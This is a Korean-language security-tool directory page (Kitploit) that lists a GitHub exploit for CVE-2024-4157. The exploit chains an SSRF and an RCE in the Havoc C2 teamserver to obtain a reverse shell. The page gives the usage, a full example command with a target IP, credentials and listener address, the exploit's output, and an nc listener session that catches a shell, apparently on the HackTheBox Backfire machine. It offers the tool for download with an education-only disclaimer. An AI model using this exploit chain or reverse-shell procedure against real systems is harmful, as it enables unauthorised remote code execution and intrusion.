Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Havoc C2 SSRF와 RCE를 연쇄하여 Havoc C2 서버에서 리버스 셸을 획득합니다. | Kitploit
도구/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
ExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Havoc C2 SSRF와 RCE를 연쇄하여 Havoc C2 서버에서 리버스 셸을 획득합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11개월 전아직 검토되지 않음

CVE-2024-4157: Havoc C2에서 리버스 셸 얻기 - SSRF와 RCE 연쇄

로컬 IP와 포트로 리버스 셸을 얻으며, CVE-2024-4157 POC와 havoc_auth_rce를 연쇄합니다.

사용법

  • 기본 정보
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port 
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
  • 예제
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • nc 리스너에서의 리버스 셸
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

크레딧

  • @chebuya님에게 감사드립니다 (SSRF), 취약점에 대한 상세 블로그: detailed blog on the vulnerability
  • @Laurence Tennant님에게 감사드립니다 (RCE), 블로그 상세 정보: detailed info on blog
  • 0xdf님에게 감사드립니다. HTB Backfire에 대한 훌륭한 writeup을 제공해 주셨습니다.

면책 조항

  • 이 도구는 교육 및 연구 목적으로만 사용됩니다.
도구 다운로드